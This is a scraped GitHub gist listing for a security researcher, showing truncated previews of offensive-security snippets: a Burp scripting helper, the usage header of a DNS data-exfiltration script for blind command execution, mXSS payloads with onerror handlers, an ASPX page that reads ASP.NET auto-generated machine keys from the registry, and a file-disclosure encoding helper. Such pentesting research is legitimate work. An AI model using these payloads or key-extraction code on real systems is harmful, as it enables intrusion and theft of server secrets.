Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
< ⊙ ͜ʖಠ />

Soroush Dalili irsdl

💭
< ⊙ ͜ʖಠ />
  • @MDSecLabs (Twitter)
  • @irsdl (Twitter), UK, The Contrived World of InfoSec "'><b>abcd
View GitHub Profile
@irsdl
irsdl / pyscripter_snippets.py
Last active Nov 12, 2020 — forked from lanmaster53/pyscripter_snippets.py
Burp Python Scripter scripts
View pyscripter_snippets.py
# ***********************************************replacer_for_python_scripter
import re,random
print callbacks.getToolName(toolFlag)
if(messageIsRequest):
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"):
requestInfo = helpers.analyzeRequest(messageInfo)
headers = requestInfo.getHeaders()
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
msg = helpers.bytesToString(msgBody)
@irsdl
irsdl / dns_data_exfiltration.sh
Created Oct 13, 2020
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
View dns_data_exfiltration.sh
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / dns_data_exfiltration.sh
Created Oct 13, 2020
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
View dns_data_exfiltration.sh
#!/bin/bash
: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns
Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"
@irsdl
irsdl / mXSS
Last active Jun 21, 2020
some mXSS samples
View mXSS
<img alt="<x" title="/><img src=url404 onerror=xss(0)>">
<img alt="
<x" title="/>
<img src=url404 onerror=xss(1)>">
<style><style/><img src=url404 onerror=xss(2)>
<xmp><xmp/><img src=url404 onerror=xss(3)>
@irsdl
irsdl / machineKeyFinder.aspx
Last active Apr 12, 2021
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
View machineKeyFinder.aspx
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@irsdl
irsdl / iso-8859-1_to_binary.py
Last active Mar 19, 2018
Convert from iso-8859-1 to binary
View iso-8859-1_to_binary.py
# Convert from iso-8859-1, utf-8ed to binary!
# Useful for file disclosure when encoding can be controlled
# The following C# code shows an example (result is iso-8859-1, utf-8ed!):
###string encoding = "iso-8859-1";
######string sourceFile = @"Newtonsoft.Json.dll";
######
######public void test()
######{
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding);
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile;